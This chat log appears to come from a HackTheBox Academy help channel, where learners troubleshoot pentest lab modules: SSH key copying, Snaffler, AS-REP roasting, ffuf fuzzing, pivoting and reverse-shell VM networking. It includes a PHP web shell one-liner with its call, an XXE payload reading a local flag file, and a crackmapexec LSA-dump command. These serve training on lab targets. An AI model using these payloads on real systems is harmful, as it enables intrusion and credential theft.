there's a reason i'm slowly walking through it instead of outright giving the answer
chmod: changing permissions of 'id_rsa': Operation not permitted
Don't worry it won't be enough
because you need to copy it to your system
oh
cat id_rsa then highlight and copy that to a file on YOUR system
and change the permissions there
also when you go to ssh as root, don't forget to include the port; as I recall this is on a docker instance with a public_ip:port
I do have a serious tip on this one, use file id_rsa after copy pasting to verify that you didn't miss a character
a better method is md5sum <file>
which gives a checksum value
note: new line at the end will change the md5sum value
Ah yes, good idea. I just want to verify that it's a valid rsa key but it's even better
it can be valid but sometimes (rarely) some text programs shuffle characters around
i've had it happen once, didn't modify my clipboard and it just... worked in a different text editor
what format
Weird
ssh root@83.136.255.167 -p55617 -i key

xd
did it work? 😄
oh
😭
You're logging into a public IP? Makes no sense
from the id_rsa file (not the id_rsa.pub) file
this section uses a public IP
Who runs ssh in port 55617 💀
For real? Ok
-----END OPENSSH PRIVATE KEY-----
any section with a public IP will have an accompanying port that's the scope
you're missing the begin line
there is no begin line
also delete this as it's spoiler
Oops your ssh keys got leaked
Rip
yes, there should be
im catting it rn there is no begin line
scroll up
i am
dm me a picture
nothing there
Do you use a 400x400 screen?
There's no -- BEGINNING --- part
there should be a ----BEGIN line
son of a bitch deleted his begin line!
ill restart the vm
Why
maybe I deleted it by accident idk
No copy it again
its on my vm
From the box
No need of resetting anything
anyway
¯\_(ツ)_/¯
There's still no -- BEGIN part tho
¯\_(ツ)_/¯
A typical ssh key should look like this: -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAA...
...
-----END OPENSSH PRIVATE KEY-----
you're missing way more lines
¯\_(ツ)_/¯
Scroll up?
Press Page UP
try doing this /bin/bash -i
it seems like your terminal is not showing everything, your only seeing the 20th line to the end
well i just did it on my end and it showed the full thing
Manually add -----BEGIN OPENSSH PRIVATE KEY----- and see if it works...
it won't
he's missing far more lines than just that
Oh
now cat the file
Press enter on your keyboard about 10 time and send a screenshot of the terminal again
Oh your terminal is broken
You can't scroll up lol
yeah that's weird
close the terminal and reconnect
it seems it's only showing like 20 lines
yeah but ctrl-shift-c isn't copy in vim
Oh yeah, open that in a text editor
you'll need to highlight then press y
Nano?
Yo terminal is broken
do my suggestion
close the terminal
and open a new one
it seems like you have some setting that's limiting also; btw you can press "full screen" to open a full screen tab of pwnbox
so you're not limited to a small window
Cool
¯\_(ツ)_/¯
¯\_(ツ)_/¯
I'd complete that part if I were you personally
¯\_(ツ)_/¯
That's just me personally tho
Getting access and the thing you were doing
Or did you do it
loooooool
Oh cool
I need help pls. I'm in the Active Directory Enumeration & Attacks module. I am trying to answer this question: Run Snaffler and hunt for a readable web config file. What is the name of the user in the connection string within the file?
I don't know what to do to get that Web Config file.
well, it says run Snaffler. did you try that?
yeah but is not working
--unknown argument
is it target URL or target URI
this is from the module example
from the github 
but --targetUrl isn't a valid option at all for Snaffler
ok the Snaffler devs earned my funny approval
Ok i did everything that says in the module, but i do not know how to look for the Web Config file
well that doesn't look like snaffler
the answer to the snaffler question will be in the snaffler output
so is the PW question after
Oh my bad. it says that the data need to be readable. i though i have to search it up in Bloodhound. Sorry lol
the data will be readable in the output :) (the snaffler output may also tell you where a file is to look at)
finally concluded, vfrank password was missing a character and got a tip from htb forum on where to pivot from 172.16.5.35!
as i said earlier, you were missing another host 😄
I was not able to spot that host running a loop in powershell.. not sure why and how I would find by myself...
Hi for the dataset on UNDERSTANDING LOG SOURCES & INVESTIGATING WITH SPLUNK [https://academy.hackthebox.com/module/218/section/2358]
Can someone from the support team or those that encountered it confirm if the executable that initiated a reverse shell to the attacker is
||demon.exe or notepad.exe||? Hence letting them execute commands on a later date via the ||randomfile.exe||?
Thanks i completed the section!
were you running the loop on the right interface?

Apparently yes, cause I found the other rabbit hole IP on the same subnet
Module: AD Enumeration & Attacks
In this section, it states:
It is worth noting this down because if we can take over this service account through some attack, we could use its membership in the Backup Operators group to take over the domain.
I haven't seen anything in this section or previous sections of this module that indicate having membership in the Backup Operators group could lead to taking over the domain. Is it saying it could potentially & indirectly lead to taking over the domain? Could someone please clarify? Thanks.
Maybe there's some information in the part where they enumerate detailed information about the group that indicates being part of the group could give permission to take over the domain?
I just did some research, is it because of the permissions this group inherently has that it could lead to taking over a domain?
If someone could confirm whether I've understood what they were trying to explain in the module's section I'd greatly appreciate it. Thanks!
bro said


Alrighty, so that's prolly why the section said what it said.
imagine using chrome 
It's edge 
even worse

Out of curiosity which browser do you use?
firefox
LibreWolf
Wave browser, because I like the bundled adware in it
@summer swallow
there we go!
kinda funny that MS blocks access to one of the best resources to AD/windows pentest
only for edge tho
All you can eat buffe
It is, I hadn't realized 😂
bro said buffe
i dont know how to spell that
"All you can eat"
There you go
oh !!!!! 😅
it's just @slender shoal

Hey, I am currently doing the InfoSec foundations path and just completed windows fundamentals. Next module is intro to windows command line and then bash scripting. But I am thinking to skip these two modules and going for the next module that is intro to networking because my plan is to do first CBBH and then CPTS. And scripting would probably be of little to no help in CBBH afaik. Am I wrong ? Or this is fine ? Really confused which module to pick next.
I'd say do all the modules in the path, they're all pretty useful and will give you the basic knowledge needed for the other paths
okay.... Thanks, will do 🙂
@next bronze I just hit this section under the AD Enumeration & Attacks module. Under the PowerView subsection there's a table of the most useful PowerView functions. Are we expected to know all this? Or is there like a good reference? Or will bloodhound just do what I need?
I don't know whether it's worth including such a large table in my notes 💀
they're useful references, but it's up to you on whether to include them
How often does one actually use them though?
depends on how often you use powerview
Alrighty 😂
Btw do you know anything about Gitbook?
I'm making my notes using it, but a table of contents doesn't show for each page unless published. Is there a way to have a toc when the notes aren't published?
nope I don't use gitbook
Okay, thanks.
Can you give a hint to where you found the LINUX01$ Kerberos ticket?
I used a provided tool from the section. Requires root as well iirc
Similar to mimikatz
Hello to all. I hope everybody is feeling awesome. I have some difficulty understanding how to create Jinja2 payloads through python instructions. This is part of SSTI example 3. It is indicated that we can go through different methods to be able to reach the method we need. But I don't understand how these are related. Any input is welcome 🙂
Hello!
Should I go through this issue?! Or is there a missing piece in the lab?
Pivoting Tunneling and port forwarding
Socks5 tunneling with chisel
I tried to download the lib6 on my own and transferring it to the box and install it locally
Didn’t work tho
rdp sessions stays black...
terminated target and vm a few times...
@stiff urchin there is a note in the section that will help you out
worked😂
I got that flags earlier but wanna practice the tools
free robux
The lab is not broken
Yup, just ran linikatz, however, how did you know that you had to use the file located in /v**/l...............
Because I don't think there is anything pointing that I should use that file except that it starts with ccache
Well the question was asking me to get to linux01 user and in my linikatz output it pointed towards that file. I'm currently working but I can send you a screenshot of the output once I'm home.
Maybe somewhere higher in the output?
Can i dm you? Don't want to spoil here
Yes. I can look at your output
Module: AD Enumeration & Attacks
Can someone explain the purpose of the parameter data to me in the following command?
Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data
This is the explanation provided in the section:
The `-s` tells it to print results to the console for us, the `-d` specifies the domain to search within, and the `-o` tells Snaffler to write results to a logfile. The `-v` option is the verbosity level. Typically `data` is best as it only displays results to the screen, so it's easier to begin looking through the tool runs.
check the tool's github page
there are different verbosity levels the tool supports
Anyone free that can assist me on the Broken Auth skill assessment
Oh, data is a verbosity level. Thanks! I checked out the GitHub page.
Hello, I'm on the "Attacking Enterprise Networks" Module and on the "Web Enumeration & Exploitation" section.
I would need the help from someone who has completed this module.
I'm trying to replicate the steps presented for ||the dev.inlanefreight.local VHOST, by adding the header found previously
but instead of retrieving the web page as seen on the module I get a "408 Request Timeout" Response.||
I have already tried to reset the environment multiple times but I always get the same result.
I also tried to change between the different VPN instances from EU/US and tried from the Pwnbox for both of the regions but it did not bear any fruits.
Does anyone encountered this problem ?
can someone clarify the difference between AS-REQroasting & AS-REP roasting cause this is not making any sense, they are practically the same
The client request is called AS-REQ , the answer is called AS-REP . Client uses the TGT to ask the KDC for a ST (Service Ticket). That ticket is provided by the Ticket Granting Service (TGS). The client request is called TGS-REQ , the answer is called TGS-REP .
https://www.thehacker.recipes/ad/movement/kerberos
"AS-REQroasting" shouldnt even be a thing
you're roasting the reply not the request
exactly
bro's tripping
I saw this in the HTB AD blog and its repeated again in this module, I assumed it was a typo in the blog
well from my knowledge they're the same, you need both a request and reply
alright, thanks man 🙏🏼
AS-REQ Roasting is possible when Kerberos pre-authentication is not configured. This allows anyone to request authentication data for a user. In return, the KDC would provide an AS-REP message.
Since part of that message is encrypted using the user’s password, it is possible to perform an offline brute-force attack to try and retrieve the user's password.
you'd still need asrep
this is hilarious btw, what a doozy 
It's practically impossible without, the encrypted session key part is needed, problem is why some places call it AS-REQroasting and others call it AS-REProasting, and there is no consistency between HTB sources.
But I'm just gonna ignore AS-REQroasting, thanks man ♥️
My brain literally exploded bro like wth
I just assume it's different names but mean the same thing
Hey guys.
On the "AD Enumeration & Attacks - Skills Assessment Part I" ||after i set up my socks_proxy and autoroute, i tried to use crackmapexec smb, but i always get :
SMB 172.16.6.50 445 NONE [*] x64 (name:) (domain:) (signing:False) (SMBv1:False)
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.6.50:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.6.50:445 ... OK
SMB 172.16.6.50 445 NONE [-] Connection Error: Error while reading from remote
Is this a connection issue on HTB side or am i doing something wrong?
I can RDP into the second host with proxychains, but cme doesn't seem to work.
I also reset the host once.||
even after loading module I can't get output of get-domainuser
2nd skills assessment of AD enum
can you give me the output you get if you type Get-Module?
The powerview script is not in the directory you're importing it from.
Use the full path or navigate there to use .\Powerview.ps1
oh shit it is
I've been getting a lot of these lately, shouldn't be a problem if the connection is stable but 
the module is not loaded
use get-module to check if the module is loaded
but ||"proxychains crackmapexec smb IP -u user -p password --lsa"|| correct no?
yeah it's correct
looks good , just make sure ,you use the right proxy on the proxychains file
and use netexec
Yeah seems something with proxy and autoroute is wrong then
nah I'm saying I've been having problems with the academy vpn
bro , I use ligolo I don't have this kind of problems
so i do the classic reset the machine 3 times, wait a day and hope it gets better? 😄
I use ligolo and I've been having all kinds of problems 
or contact the support
That never helped me with anything tbh :/

same
Hi there, thanks for reaching out. I'm XXX
Are you still facing this issue?
they reply after 16hr , till that time either problem is solved or not in mood to continue that shit again
they used to be fast like 2-3 hrs
hmm for me these lag and bug started from jan-feb
they were very fast in reply at that time but now 💀
Does anyone know why while the hashcat says the ntlmv2 hash was cracked but doesn't show the password? I looked both in the potfile and with the --show without showing a password.
what output are you getting?
hashcat -m mask hash.txt --show ?
I'm in the DNS footprinting module, I'm at the last question. I'm sure my command works after some research, it's the right brute force subdomain. But I have the impression that my wordlist is wrong. Any tips for me.
||$ sudo dnsenum --dnsserver 10.129.93.138 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt dev.inlanefreight.htb||
dude no french here
oh excuse
hashcat -m 5600 hash.txt --show
looks good to me
yeah , what's the output you got
at the end of the hash I get this 003200340030000000000000000000:
Can you give the whole output?
it's from skills assessment.. is it ok to share it here?
It was just the wordlist
gg
just put the output so we can see what's happening
Good point, not sure 😄
I send it to you on PM
how to get perms to the general chat
For the password attack lab- medium, after i got the D*.docx, what do i do next? i tried to read the content but it cant be read.
Hi guys, I am just solving HTB Academy 'Injection attacks' module 'LDAP - Data exfiltration and blind exploitation'. I already got what I needed but the problem is if I submit the answer it shows me an error. I tried upper and lower case, because in the exercise it is not case sensitive. Then I tried even encoded space but no luck. Did anyone submit the correct answer for this module?
what you can do to read protected files ?
academy down ?
no
everything just stopped working for me suddenly
I just reloaded my viewer page and the module page
seems to be back now, but for like solid 4 minutes the ssh I got with the target was just stuck
maybe a computer hiccup
that does not necessarily reflect the underlying infrastructure, the web page could be up, but the labs down
and..... it's stuck again....
idk have you tried hitting it with hammer lol
hitting it with, spawning a new machine 
yeah ping showed crazy to me too like 1000000
mine is really high right now too
same deal with new machine, now I cannot even ping it anymore
now its down maybe switching to a different server
well, at least I know it's not just me
Having problems with connecting via SSH. I have done as specified but it returns with 'port 22: No route to host'
What am I doing wrong?
if you check the routing table on your attack box, does it show the HTB IPs ?
routing table?
have you tried switching locations for the pwnbox
no, does that usually work? i'll try it
I'm talking about the guy with the computer freezing
is the target machine turned on

have you considered spinning up your own VM ?
yh i could
it's pretty easy and can even run with like 2gb ram and 1 cpu
kk cool
ya that's always fun
ill try that cheers
I figured out alr.
After running SharpHound using the following command, my ZIP file was generated but some other .bin file was as well. Any idea what it is?
.\SharpHound.exe -c All --zipfilename ILFREIGHT
just google m8, it's the cache
https://posts.specterops.io/sharphound-evolution-of-the-bloodhound-ingestor-3b46643ccbd8?gi=d7efe7e17b76
I used BloodHound to list all the Kerberoastable accounts, do I have to manually count them? Do I have to manually count the nodes on the screen? Is there a quicker way?
Oh okay, thanks 😅
@next bronze Any idea on this? I must be blind cuz I'm sure they must have it somewhere.
I read somewhere that there's a results tab that may show the number, but don't see one.
I have switched to Kali on my VM on my PC. I am getting the same problem, I am connected to Starting Point and the vpn is set up properly
idk what section it is but bh is not the only tool
It's this section, the first question has asked to do it using BH.
use impacket-GetUserSPNs | wc -l
Thanks for this. But do you know a way to do it using BH?
imagine env with 300 kerberoastable users
lol
alright im stuck at attacking web applications with ffuf
at subdomain fuzzing
i scan and i dont get any correct results
do i scan using a bigger list?or what
it says that the domains may not be public
oh shit wait
Ack! They upgraded Information Gathering - Web Edition and now I'm only half done with it after it had previously been completed.
o7
Maybe asking a third time's the charm.
Hello, I'm on the "Attacking Enterprise Networks" Module and on the "Web Enumeration & Exploitation" section.
I would need the help from someone who has completed this module.
I'm trying to replicate the steps presented for ||the dev.inlanefreight.local VHOST, by adding the header found previously
but instead of retrieving the web page as seen on the module I get a "408 Request Timeout" Response.||
I have already tried to reset the environment multiple times but I always get the same result.
I also tried to change between the different VPN instances from EU/US and tried from the Pwnbox for both of the regions but it did not bear any fruits.
Does anyone encountered this problem ?
You're not gonna get help with AEN
People do this module completely blind, as the module itself is the walk-through for it
I suggest reaching out to support to confirm its not just a skill issue
The problem I described is the only flag I can't retrieve I already finished the whole module
Still reach out to support. But if you were able to complete the rest of the module, skill issue
Skill issue while doing the exact same steps described in the module to get the flag ?
And being honest, it's best to just reach out to support
They'll confirm a lab error
How do I contact support ? Directly from discord or from the website ?
From the website
Green bubble on the bottom right
If you don't see it, disable adblock
408 is generally a network error
As it says "timed out"
marcie is big brain just trust
wait marcie your name is blue now??
GOOD SHIT MA BOY
Yeah I know that's why I tried from different VPNs of different regions, from both my box and the Pwnbox, etc...
I am having issues connecting to the SSH server in the Linux Fundamentals module. I have connected to the VPN, however the IP given does not connect and I can't ping it either. What do I do?
If you do ip a do you have a tun0 ip?
yes
Second did you run the openvpn command with sudo
yes
Are you connected to the right vpn
yes
Academy-regular.ovpn
yes that is the one
Is that also the ip given when you "Click here to spawn target!"?
yes
i thought you had to put your own IP?
yes
If you do, sudo killall openvpn
k
Then rerun the command
k
Your issue was network collision, you had too many interfaces all trying to route the same way
Also terminate the pwnbox
Struggling with this question: **After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com.** I've installed Scrapy using pip3 and then ran ReconSpider.py but it's giving an error. Any ideas?
Stuck at File Upload Attacks Module Blacklist Filter Section.
I’m sure I uploaded the php file but can’t execute it
I don't see any errors
Ah at the bottom
You'd need to actually read the error to figure out where it broke
ValueError: Missing scheme in request url: inlanefreight.com
Weird I followed these instructions I wonder if its a problem with Scrapy
You need the http:// or https:// yeah, I'll update the command 😛
Then use http://
You broke it

Tbh though reading the error explains the error
python3 ReconSpider.py https://inlanefreight.com works fine thank you!
Didn't even need the staff clarification. 
Idk if it's good or bad that I can read errors like that
very good 
Tbh I've spent too many user error hours troubleshooting things
Hi... There is a problem with the htb academy portal... The links for Modules and Paths are not working... Nothing happens on click...
Is it my browser or the portal...? 😆
Works on my end
It's strange...I tried firefox and chrome and the problem persists...
try disabling all plugins ¯\_(ツ)_/¯
Thanks...It's the ad-blockers
It usually is
HTB doesn't serve ads btw
It's just some backend services get hit by the ad-blockers
http://SERVER_IP:PORT/profile_images/shell.phtml?cmd=id
Only get the php script at response
<?php system($_REQUEST['cmd']); ?>
@pseudo kiln Yess me too
I just started one up
Pwnbox -> Academy just bricked for me as well (no connection), restarted both the pwnbox and challengebox multiple times
good to know, I was thinking of giving it a shot with the pwnbox too
changed servers too, so prob nothing else to do
Message support and keep an eye on https://status.hackthebox.com
im doing filtering results on attacking web applications with ffuf
ive executed
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:43588/ -H 'Host: FUZZ.academy.htb' -fs 900
but it doesnt find anything
Make sure you're filtering the right thing
Also make sure you have academy.htb in your /etc/hosts
oh lemme check
cat hosts
127.0.0.1 localhost
127.0.1.1 kali
damn
i edit it myself yeah?
Yes
alright
do i use the ip:port as the academy.htb
oh alright
Just the ip
alright done
have i filtered somewhere wrong?or missed something
or both
I wouldn't attach a filter unless you know what you're filtering for
so i remove -fs
So run the command, see what the common response is, filter that out
It's that simple, as shown in the section
Now you should see what fs to filter for
You don't want the size that's flooding your screen
they used -fs 900 and found admin/
that confused me ngl
That's just an example
ah
Examples won't always be 1::1 to what you do, so you're not just copy/pasting commands
ye ofc
Gotta actually use your brain
They also explain why they used 900
ye
i thought it had something to do with -fs
It does
When you fs, you're filtering (out) the response size you don't want to see
So it only shows results that you want to see
If you want to go a few extra steps, use a few curl commands to see what that response is
So you can see that it's "junk"
so i look at the size:
?
and filter that out or something
What is the common size you see when the ffuf command is running
I'm learning about XXE. To bypass XML's restriction on joining internal and external entities, we load an external DTD.
I wanted to try an alternative route (all of the entities being external) like so:
<!DOCTYPE email [
<!ENTITY begin SYSTEM "http://<ip>:8000/start">
<!ENTITY file SYSTEM "file:///flag.php">
<!ENTITY end SYSTEM "http://<ip>:8000/end">
<!ENTITY joined "&begin;&file;&end;">
]>
On my machine:
$ cat start end
<![CDATA[
]]>
And using &joined; in the payload. Unfortunately, this does not work. Does anyone know why or if it could be made to work?
Logically it makes sense for this to work
So...
-fs 986
Try and see
are you using nat or bridged?
NAT
Use bridged mode
Alright
well I give up for today, maybe tomorrow academy will fare better
Chill
xd
do you know if it's possible to increase the size of a rdp session (xfreerdp)? I'm having a very bad time trying to read the screen 😅
Have you tried rdesktop?
It's a very very nice
I'll try it, thank you! (I was using xfreerdp)
Compared to xfreerdp, you may need to specify the domain for some cases in rdesktop. xfreerdp can sometimes infer the domain for you
anyone completed htb academy web info gathering updated ?
Xfreerdp has the /dynamic-resolution option
I'll take a look into that, thank you
I use it often
wow, I've tested it now, that's exactly what I wanted, thank you!!
It can also resolve the pesky black screen thing, when you resize the screen it redraws it and shows the corporate AUP screen
i need some help with question 3 in ACTIVE DIRECTORY ENUMERATION & ATTACKS Privileged Access.
Everytime I try to ssh to the 172.16.5.225 IP I get the error in the screenshot. I've looked at the solution and followed it but i still get this error.
The "S" after the password was added when i did the screenshot.
I've tried to reset the box but still the same.. 
my ping is over 9000
the information gathering update is great. just noticed it
Copy the pw to a notepad on the windows machine then copy it from there to the terminal, or use right-click paste
For w/e reason a regular paste doesn't work
Hi everyone! 🙂 I was wondering if anyone could sanity check me on the last question of the Kerberos Attacks Skill Assessment.
The user who I gained access to through the automation in the last step doesn't seem to have any privileges
Thanks I’ll give it a shot!😊
or isn't a part of any group thats important
I sanity checked this recently and it's odd, but not something HTB can realistically fix
why don't just ssh directly from your kali/pwnbox to the linux box?
Because you need to pivot
You can't access the linux box without being on the network, it's on a 172.16.x.x network, the vpn only gives you access to the 10.129.0.0/16 network
mmmm no, that kali box is another attack host you can use, you have direct access to a windows attack host and linux attack host, so you can test different tools to reach the same end
Yes but you'd still need the ip of the host to directly attach to
Ah so they did fix that
Used to not be the case where it would give you two IPs
Used to only give you the main box IP depending on what's needed for the section
I have tried to ssh from the windows box to the linux box and it accepted the credentials provided, @misty saddle have you checked the keyboard layout? maybe you're typing something different
Because when you ssh to the attack box from the ms01 box, if you did ip a it had a tun0 interface to directly connect with
Used to*
Glad they show both now
hi, I'm stuck in the linux fundamentals module in the "file descriptors and redirections" section and it asks how many total packages are installed on the target system so I do the following command and I subtract 1 from the first number but it doesn't work
because you're not ssh to the target
and 2 the proper command would be wc -l
all of the questions are to be answered by ssh into the target "Click here to spawn target!"
Yes I am ssh'd to the target
Mmh maybe I got disconnected and i didn't see it
i see in your screenshot us-academy-[number] half visible
btw you don't need to cut that part out
(sorry my English is not perfect)
Okay, thank you very much for your help, I try to learn linux and I'm not a pro so I didn't notice that I wasn't connected to the target, thank you
And I have another question, I can't ssh to the target with another machine, it works only with the pwnbox, is it normal?
you need to be connected to the VPN to connect with your own VM
as the IPs are on a private Subnet
Thank you for helping
update: i can get a reverse shell but only on my host machine?? it works on my debian install but not my kali vm??? ???????
are you running the vpn on your host machine?
no
that is odd then, are you using NAT or bridged?
how do i find that out
it's network settings of your VM software like VirtualBox or VMWare
but I doubt you can catch the shell on your host without it running the VPN
and not in your VM; are you sure you didn't run the VPN on your host by accident?
i mean like if i run the vpn and the browser with hackthebox on my host then it works, but the same configuration does not work on my vpn
wdym "and the browser with hackthebox"
ignore that part
like the in-browser VM?
nc works from my host machine but not the vm
can your VM reach the internet?
yes
did you turn off the VPN on your host when doing it in your VM?
yes
otherwise you're either explaining things poorly; or should reach out to support
since this is really weird
ok hold on
Use a different reverse shell
no it's a problem with my vm
i tried like 7 reverse shells and none worked and all of them worked on my host machine
Oh ok
sounds like your networking is messed up in your VM
are you fucking kidding me
not an issue between baremetal and VM
simply an issue between keyboard and chair
everyone here spent a fuckin month convincing me to switch from bare metal to vm
ignore them
it's not a host issue
VM is fine
See that's just dumb
i use a VM; and i've had things work perfectly fine
Ye yeah...
marcie you were one of the people who convinced me to switch to vm
I'm suspecting that there's some networking thing in the background messing with things
yes i'm stating to ignore Candy because they're not helping your issue LMAO
ah ok yeah i'm gonna do that as well
I suggest restarting your system completely
then trying again
something tells me there's a background process that got stuck
I'm suspecting you still have the Host running openvpn
i don't
ok my vm is using NAT, i guess i can try changing it
going to try restarting although i'm pretty sure i've tried already
do you have the listener even running to catch the shell?
nvm just saw it
When you execute the reverse shell, does the page keep loading or does it finish loading?
the page should continuously try and load while it's running
when it works, it keeps loading, when it doesn't work, it stops loading
I mean if there's something wrong with your end the page should still keep loading
this may seem stupid
but remove the site from your /etc/hosts and just use the IP
as that's the only difference tbh
yeah i actually just thought of that
pretty much at the same time as you said it
guess i'll try it
Also your VM is in NAT or Bridged right?
i just changed it to bridged
i also changed another network setting that i don't remember
This is stupid to ask but have you actually tried pinging the target through your VM?
yeah it works fine
amazingly, none of the five things i tried worked
as usual
i have an issue
i find a ton of different fixes for it online
none of them work
While executing the reverse shell, open Wireshark and monitor any traffic from the target to your VM and see if there's traffic actually coming
try reinstalling the Kali VM (or install a new/fresh one) and see if it works then
if it does; there's an issue -- it could also be a weird firewall thing going on
I was about to say that
Also just try running the netcat listener as sudo
ufw should be disabled
completely disabling the firewall didn't work
am i just doomed to deal with this for the rest of my life? completely unfixable technical issues? constantly finding fixes and none of them ever working?
Did you monitor incoming traffic?
Try reinstalling netcat?
Use metasploit to listen for the rev shell instead of netcat and see
Bruh just reinstall your VM at this point
i'm gonna lose so much shit
if reinstalling my vm doesn't work i am going to, without exaggeration, cancel my academy subscription and give up on cybersecurity entirely
because i've been dealing with the exact same shit for years
technical issues, 10 fixes online, 0 work
god does not want me to get a career in IT
i'm genuinely at a complete loss as to why this does not stop happening to me
It's not specifically to you lol chill...
i've never met anyone else with this problem
Errors are common... You just move forward finding ways to solve them
that's what i've been trying to say for the last 15 minutes
i DO NOT move forward finding ways to solve them, i literally never fucking solve them
But yeah since metasploit doesn't work I am 90% sure something is terribly fucked up with your VM
do you think i mean i'm the only person who gets technical issues?
Nah
i might reach out to htb staff tomorrow
Ok
tbh if you get this frustrated, it's probably for the best ngl. you gotta be prepared to fight through the "it's so over"
to hit the "We're so back"
yeah metasploit not working means something is really wrong
i can't even remember the last time i hit the "we're so back"
how long are you spending per day, out of curiosity
on average
on days off closer to 12
Facts
yeah then I get the frustration of the 2 hours you get that little bit of time to work on it and it doesn't work
it spent 12 hours not working last time i spent 12 hours on it
but tbh I suggest taking a bit of a break from it, and coming back at a later time
i just now tried using pwnbox but i can't even figure out how to get it to work
i.e. shelving it for a few days or a week. Let your brain mentally reset your frustration
You do not have the exact same setup. One screenshot shows you connecting via hostname, the other is IP.
yeah we went over this, changing that didn't work
There are times where I've had to completely reinstall my entire system multiple times bc of errors I can't figure out. It might be a skill issue but these sorts of things are extremely common in this field
pwnbox is just an in-browser Parrot VM
yeah i know it just kept bugging out
sounds like maybe a driver issue then on your end
if it's "bugging out"
as I've had no issues using it when i've needed to
it's clearly a networking issue, so we would need to see how the vm's network is set up to assist. what hypervisor are you using?
virtualbox
Is ur host Linux?
i have no experience setting that up since i use the superior vmware, but if you can show the network manager config we may be able to help.
yes their host is linux
their prior screenshot shows this
if your vm can reach the internet, it should be able to reach htb's servers. i wouldn't recommend bridge mode though, NAT is the way I connect.
NAT can cause issues
well NAT and bridged both did not work
i've only ever had issues with bridged
if i can fuckin get pwnbox to work at all then i'm going to try it on pwnbox and if it works on pwnbox then it's something horribly wrong with my vm
well your host is having issues even using the Pwnbox
That probably is the issue 90%
pwnbox is bugging out on windows as well
works fine on my machine
also define "Bugging out"
that's not really helpful
like not displaying properly, not doing what you think it should...
Just reinstall the VM. If that doesn't work, choose a different hypervisor like qemu and try again.
vmware pro is now free.
I found that qemu works better on Linux hosts
y'all i am literally giving up
but you gotta give your info to broadcom, so L
vmware pretty much industry standard
anyway
everyone else trying to play catchup
I was able to launch pwnbox on my system with no issues
this is happening on linux and windows
looks like issues with your graphics card
i cba to make a screen recording
both graphics cards?
this is on two different machines
yo this is the third time i'm saying now that i'm giving up for the night
Ok
TBH it looks like it's trying to resize as if you're trying to open academy within the pwnbox
thank you all for the help
Like we're forcing you to do shit lmao
im going to try again tomorrow
yeah, you're having pwnbox inception there
you are logging into the pwnbox and then logging into htb and viewing the pwnbox again
there's no reason to do that and it's probably causing issues
and does so recursively as it's refreshing constantly
i can't figure out how to connect to remote host then because the one on academy on my host machine isn't working
you can just browse academy on your host; then interact via pwnbox
when using the pwnbox, you don't need to connect to the remote host with your computer. the pwnbox is already connected to htb's internal network and can reach the victim box you spawn.
you don't/shouldn't be opening academy within pwnbox
well it automatically connects to your selected vpn region* but same point really
you don't connect to the vpn when using pwnbox, it's already connected as i mentioned
no like i can't figure out how to connect to the IP that academy gives me
it doesn't work
make sure you don't have any vpn processes open on your host
if you're using the pwnbox, don't run the VPN, and vice versa
so i spawn a box through the pwnbox and then i connect to it right?
yeah that's the fucking thing i just said i was having a problem with
just don't open academy with the pwnbox
then you're doing something wrong
you spawn the target box. then you spawn the pwnbox and use it in another tab or something. just use the pwnbox directly, it can already connect to the victim box you spawn
what do you mean "It will not connect"
the pwnbox is already connected, you do not need to connect it to anything
holy shit dude it won't connect to the webpage
you don't connect to the vpn with the pwnbox, it's already connected to the internal network.
"It doesn't work" and "It will not connect" aren't really proper errors for us to help you
the webpage won't load
Wym?
you literally showed us a video of you looking at the pwnbox
ok so you mean the base webpage of the target won't load?
yes thank you
this is what i mean when i say i have nothing but unfixable technical difficulties
tell that to the 20 ways i tried to fix my reverse shell issue
they are fixable, but you're probably searching for the wrong thing
they seem unfixable to you because you're not really explaining the issue well enough
you cannot articulate your problem correctly, so you probably can't search for the correct solution
this could just be that your VM is fucked
Lol
since it worked in host, and metasploit wasn't working
you have to be willing to accept "Maybe I just need to reinstall" as a fix option
Let's take it at step 0; is your host connected to the VPN, if so -- kill the VPN process
okay ignore that it was an example
i'm going to try reinstalling tomorrow i was just giving an example
good luck
That's probably gonna fix everything trust
reinstall isn't going to fix the network manager's configuration
look
we're suspecting other issues since the fact that Metasploit wasn't even working
https
the pwnbox should work easily as long as you spawn the pwnbox and target ip, then just use the pwnbox in another tab or something. if you want your vm to work you'd need to configure the network manager correctly.
already tried
tried that too
the site isn't using https
never mind
metasploit is a piece of trash sometimes and does require a reinstall sometimes.
i tried http, didn't work, tried https, didn't work, tried http, worked
it began freezing up my whole vm and i had to reinstall
don't you need the port too? each spawn uses a different port
no
no
depends on the box
this one doesn't have a port
not for targets that are using the 10.129.0.0/16 subnet
ah. noted. i haven't gotten that far yet 😅
only for ones that are using a public_ip:port
if you're doing the CBBH path, you're likely not gonna run into many examples
as most of the web modules use docker containers with a public_ip:port
and it stopped working again
i see. yeah, i just started CBBH. breezing through the first few modules at the moment. i only started HTB this week.
I think you should just do what you said; and take a break
we don't know what "it" is, nevertheless you sound frustrated and should probably take the night off as you said
come back tomorrow with a rested mind
when you're repeatedly getting frustrated is a good sign you need a break
pwnbox
very underrated advice. taking a break does wonders. seriously
And a positive mindset....
I can provide help if you want, but you said you were done for the night
fun fact, when working on a difficult problem -- researchers found that when participants were able to take breaks/weren't given a time pressure they were able to solve it faster
I suggest making sure you understand the content; breezing through doesn't necessarily mean you understand what you did
taking notes to help make sure you understand what you're doing is helpful
oh yes, i do understand it. 🙂 i'm not new to this. but never had any formal education (my technical background is something else). so i'm breezing through the parts that i'm already very familiar with
ok yeah the webpages on pwnbox literally just keep timing out and coming back tomorrow with a rested mind isn't going to fix that
Lmao
never mind my vm was eating my bandwidth for breakfast
I can't
okay i got a reverse shell on pwnbox which means there's something horribly wrong with my vm and on that note i am off for the night and i am going to come back tomorrow with a Positive Mindset now that i know where to start troubleshooting
thank you all for the help sorry for being an asshole
That's literally what we've been telling you for the past hour
yeah i know i just wanted to see if i could get a reverse shell on pwnbox before i got off for the night
it's your network setup like i said
once the network manager is configured correctly i'm sure it'll work fine
the vbox network manager right
